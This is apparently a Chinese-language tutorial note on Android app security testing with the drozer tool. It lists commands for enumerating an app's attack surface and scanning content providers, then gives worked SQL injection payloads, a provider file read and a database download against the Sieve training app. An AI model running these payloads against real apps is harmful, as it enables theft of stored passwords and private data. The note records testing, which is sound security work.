《二》drozer漏洞扫描
对于现有的项目做了部分角度的安全测试。做个记录。 工具:drozer,源码地址:[color=#069d6 !important]https://github.com/mwrlabs/drozer/
步骤:
准备:
1.运行drozer-agent.apk
2.选择embedded--enable
3.设置端口转发:adb forward tcp:31415 tcp:31415 运行:
1.连接drozer:
drozer.bat console connect 2.列出详细APP信息:
run app.package.info -a com.xxx.xxxx 3.查看APP的配置信息
run app.package.manifest com.xxx.xxxx 3.分析是否存在攻击攻击点
run app.package.attacksurface com.xxx.xxxx 4.查看暴露的provider权限
run app.provider.info -a com.xxx.xxxx 5.获取Activity信息
命令 run app.activity.info -a
示例 run app.activity.info -a com.xxx.xxxx 6.检测SQL注入
命令 run scanner.provider.injection -a
示例 run scanner.provider.injection -a com.xxx.xxxx 7.检测目录遍历
命令 run scanner.provider.traversal -a
示例 run scanner.provider.traversal -a com.xxx.xxxx 8.获取所有可访问的Uri
命令 run scanner.provider.finduris -a
示例 run scanner.provider.finduris -a com.xxx.xxxx 9.SQL注入
命令 run app.provider.query [--projection] [--selection]
示例 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ 列出所有表 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
获取单表(如Key)的数据 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--" 10.读取文件系统下的文件
示例 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 11.下载数据库文件到本地
示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db
|